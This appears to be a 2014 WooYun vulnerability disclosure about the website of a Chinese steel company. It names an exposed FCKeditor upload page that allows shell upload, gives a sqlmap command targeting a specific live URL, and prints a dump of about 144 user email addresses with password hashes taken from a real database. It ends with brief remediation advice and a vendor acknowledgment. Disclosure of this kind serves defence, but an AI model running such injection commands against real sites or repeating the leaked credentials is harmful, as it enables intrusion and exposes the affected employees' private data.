当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088141

漏洞标题:济钢集团有限公司站点 Fckeditor编辑器漏洞 + SQL注入

相关厂商:济钢集团有限公司

漏洞作者: 感染者

提交时间:2014-12-22 15:14

修复时间:2015-02-05 15:16

公开时间:2015-02-05 15:16

漏洞类型:网络敏感信息泄漏

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-22: 细节已通知厂商并且等待厂商处理中
2014-12-26: 厂商已经确认,细节仅向厂商公开
2015-01-05: 细节向核心白帽子及相关领域专家公开
2015-01-15: 细节向普通白帽子公开
2015-01-25: 细节向实习白帽子公开
2015-02-05: 细节向公众公开

简要描述:

济钢集团有限公司 网站编辑器漏洞+注入漏洞(大量信息泄露)

详细说明:

济钢集团有限公司 网站编辑器漏洞 + sql注入漏洞 ,可导致大量信息泄露。

漏洞证明:

一、编辑器
Fckeditor路径:
http://www.jigang.com.cn/jgjtww/editor/filemanager/upload/test.html
如图:

1.png


说明:可以上传shell
二、SQL注入
sql注入命令:
sqlmap -u http://www.jigang.com.cn/jgjtww/weblist.jsp?cid=1321 --dbs
如图:

2.png


可以看到有好多数据库,下面根据经验选择一个深入
测试DHCC数据库:

4.png


然后取得的C_USERNAME和C_PASSWORD的信息,
如图:

3.png


全部信息如下:

Database: DHCC
Table: T_USER
[144 entries]
+----------------------------+--------------------------+
| C_EMAIL                    | C_PASSWORD               |
+----------------------------+--------------------------+
| NULL                       | IKRclNb97rSQsiiRC6sIhQ== |
| [email protected]        | HzhwvidPbEmz4xoMZyiVfw== |
| [email protected]               | SBAt7S9Xxu9JfBhKDqcKuA== |
| [email protected]                 | TBH6LiTuDXwTleQmPocSKA== |
| [email protected]                 | EwQKjytXY5r0ONO5Id3EEA== |
| [email protected]                 | 88mc5mWIwUCeMK1vKFz2/w== |
| [email protected]                 | VHO177TeDPg9abFskeaEgA== |
| NULL                       | ewA7PsQumJoppxJqRWew9A== |
| [email protected]                 | eKp4F0jCU/yDkvYmCbwgDQ== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | DHS394QJpAIqLExaXKPuGQ== |
| [email protected]         | 7AKLzqTaaTajIX9RhJeNEw== |
| [email protected]            | VIKNACl0r3SN40mpd0cVwQ== |
| [email protected]    | VIKNACl0r3SN40mpd0cVwQ== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected]       | THUSvRY3Uc4CISwL0tIO6Q== |
| [email protected]     | QK0wilh78ri5RjBIk9YI1Q== |
| [email protected]        | YohpIC/cznlw3bfv4EWIbg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | v3ikTG8qeUTbittU9zdipA== |
| [email protected]            | SoGKmYCWVNzw4EcWZzIa8Q== |
| [email protected]        | abhbBgzLkk6JWrbbqXA18Q== |
| [email protected]       | zFJsA6GzFaWxBF7ng+8Lhw== |
| NULL                       | JPSLm81+NYMc3BhkYZyBMw== |
| [email protected]     | UsaeOlczEIGCMzHE5p0/Lg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected]       | nb9xpclY3exzkkKiZRTlbQ== |
| NULL                       | jWDRTqKKqQb/OaiFKQ2PFA== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| 123456789                  | TYCxf/kl3caIo+RYKVTvjA== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected]      | TYCxf/kl3caIo+RYKVTvjA== |
| [email protected]             | eojsfqwnI6SqtCEuaMfYFA== |
| [email protected]            | M3zqPVtS4m9MrK3O3RyizQ== |
| NULL                       | IwLKxo9x3GuQmDtUVdoicw== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| ????                       | aY1RoZ2KEhzlgUmde3AWaA== |
| [email protected]       | IwLKxo9x3GuQmDtUVdoicw== |
| [email protected]        | 4QrcOUm6Wau+VuBX8g+IPg== |
| wu                         | /KRvZB9SK09ykn8ReCjFlw== |
| NULL                       | 4QrcOUm6Wau+VuBX8g+IPg== |
| [email protected]             | KMtY9/6faF+16SRtXbqmyQ== |
| [email protected]      | 5lrH7HZx1XHzJ0GhZo2VUw== |
| [email protected]     | 4QrcOUm6Wau+VuBX8g+IPg== |
| NULL                       | ogx7xR2Z2FOpFxVl+CHDOg== |
| [email protected]             | q7Wyoc/DN2YXu0kieahO8A== |
| [email protected]        | kbda5lb0L/GvVKd1xs5fkg== |
| dd                         | qSnj1vKJoH1OkRreQEt0OQ== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected]                 | sdj8320NtwEccfww5670pA== |
| dd                         | Nuuh4eNDJ5hX6n9ppZcyTg== |
| [email protected]                 | 4RwEP84nkVEu3mh4XBjE0w== |
| [email protected]                 | xxXw54UtTTJltcl0QC/6/Q== |
| [email protected]        | cHcGBmdKqXS0WjCMgIJUZA== |
| [email protected]              | MmkpAYUDvF4tRgzmizGC/w== |
| dd                         | 4IOSu4ne247W+ymPjnKcFQ== |
| dd                         | d+Z4lCbRMeTYYuysTH0MXQ== |
| [email protected]      | CtJ7Q5MiicrTsP92FtBRAw== |
| [email protected]         | F5aavPPuhzcgBacTxf1oWw== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected]                 | lyPGBE1v56AX/kwI4T4spg== |
| [email protected]        | q4DywTH2H5foqfT1R/V/hg== |
| [email protected]                 | u5bBsXEdbrPu0Wz/W2GlYQ== |
| [email protected]    | 8K7XQ8atQ3C/48OpTRUK3w== |
| [email protected]                 | E1fk4yDNw7k79ONI9QkbzQ== |
| [email protected]            | lueSGJZetyySpUndWjMBEg== |
| [email protected]              | 69j12P2cSFX/dJ1q+PsQvg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected]                 | oDzoaLw+8hF1xpLVXHfotQ== |
| NULL                       | mILdUNOWYCpGHnvLQ1CDlA== |
| NULL                       | v3ikTG8qeUTbittU9zdipA== |
| [email protected]               | 8/g7St6byb4vfCYZH43a6w== |
| [email protected]                 | VPo2JeSEUfyWdEGfaz88jw== |
| [email protected]        | cHcGBmdKqXS0WjCMgIJUZA== |
| [email protected]           | /daGMofjTEWWFwYiwCD5/w== |
| [email protected]          | ZwsUcorZkCrsujLiL6T2vQ== |
| NULL                       | 6TQSiXfouMaO32cfahl/eg== |
| NULL                       | kSeO18ACVNSqu6xIhRZJlg== |
| NULL                       | dOrT98G6whoxYg4v6KdEFA== |
| NULL                       | vN00FTpr5U47SMAAH0ltRA== |
| [email protected]            | ktCCauTpzfreYnGPXdhMMw== |
| [email protected]          | fDv+td9Bir7RpyTcfzmWeA== |
| [email protected]         | Tvjw/mdrdzx8MnnW14UtpA== |
|  [email protected]            | 4QrcOUm6Wau+VuBX8g+IPg== |
| [email protected]          | kfHVMpmAzidmH7LtP1ogsA== |
| NULL                       | p7WE5pFDQN2zmgEm6SeBgA== |
| NULL                       | kuFG40U//NP0ohY72K1ovg== |
| 777                        | 3A+n3z0HkEoJKIvS0rtfQA== |
| [email protected]             | X5/ESGAAQFmZM55+77o7eg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected]        | g7TvWuS7NgyWYors2pdCAA== |
| [email protected]          | yHjaigqri4CJdd1hlWzBkw== |
| NULL                       | udfg8WmHBAI1VOTvUTiMkw== |
| [email protected]                 | greLiJMumWibbD8pFOVjNw== |
| [email protected]                 | 4Ifj4CcLdlX7lwI88/MLuQ== |
| NULL                       | VKK/jAms5n01E6qhqnqg8w== |
| NULL                       | d6RG3hh8TpCBnFXOlodt/Q== |
| NULL                       | uzk4tkM8uaTrFiLJ8fe2TQ== |
| NULL                       | ICy5YqxZB1uWSwcVLSNLcA== |
| [email protected]           | +tkWjVP8z2pRedPZgacWcg== |
| [email protected]    | VY/gs68nvM1BU91pz2VD6A== |
| [email protected]            | AulXK1qmPAyhevua4dMAlw== |
| NULL                       | aWw189UbxLd5Te/6eHUBFw== |
| [email protected] | RyeLK3CttmK2VkOb3/UdLA== |
| NULL                       | z80ghJXVZe9m59/5+Ydk2g== |
| NULL                       | JfnnlDI7RTiF9RgfG2JNCw== |
| 1                          | uck/vf0qMFBOBdOwsyMH2g== |
| NULL                       | xMpCOKC5I4INzFCab3WEmw== |
| [email protected]       | E8L3L/1VdLzpFPUsjMlSJw== |
| [email protected]                 | dcBTQud9P87YLQvINayeLA== |
| [email protected]                 | o2CIhS+0rdus+tDYUcY6hA== |
| [email protected]             | LirSXtTangxaLLVdiM9ZLQ== |
| [email protected]         | q56CAfVGrwXdN8l0YValdA== |
| NULL                       | 2lGppFt73kLtwahelAU2ZA== |
| [email protected]     | gjaThN9fxSQQfVBgNJuMOA== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected]        | ZRMhP44BezLxtoRfOwTITQ== |
| [email protected]     | v9kl+oYIS9AwD95/0F3dlw== |
| NULL                       | Rup1auw32OBr1BVPM2Balw== |
| [email protected]      | s1lPHxeoIjP/QcQ3rzV07g== |
| [email protected]                 | CN62AHFz+LP2B0TFA6LGsQ== |
| [email protected]                 | hU5CXGFrk318b9ZBUWu4Bg== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| [email protected]                 | dlR78kNHQd0FlGiKKiY1Iw== |
| [email protected]         | MPg+IhpLqqGdtn1gDG60sg== |
| [email protected]         | u3qmhr2oUNdBLNDeaeL72g== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| NULL                       | TsGEAog2GtMjrC4eNSnROw== |
| NULL                       | 1B2M2Y8AsgTpgAmY7PhCfg== |
| z55234                     | br52yftBG+l7Ow1It5GnyQ== |
| NULL                       | HzbBXWo9GNUujUk7yBh8uQ== |
| NULL                       | 2sdFNFoXzduN0Bg5Bo4qGw== |
| [email protected]                 | cllT25kNqSq8sQZAXuB2FA== |
| [email protected]               | Y4cPH3luZJiDs/4IIpyAbA== |
| [email protected]     | Jk0ZdCS4zhLPpmOoAcCD9Q== |
| [email protected]                 | fMtyfvA8Meo8WyYPbSh3IQ== |
| QUYINGCUN66                | JfnnlDI7RTiF9RgfG2JNCw== |
| [email protected]                 | pYlmvKqhnl3hBwJscfvz3Q== |
| [email protected]          | RsTYHA1UROOTC9cWKWWKFA== |
| NULL                       | ISMvKXpXpadDiUoOSoAfww== |
| [email protected]                 | lY3qnKdfOiqBgL4wcKpUfw== |
+----------------------------+--------------------------+


说明:信息量巨大,仅测试了很小的一部分。恐怕会有大量企业隐私泄露风险

修复方案:

修复fck漏洞:删除没用的页面
SQL注入:过滤掉特殊字符

版权声明:转载请注明来源 感染者@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-12-26 16:14

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无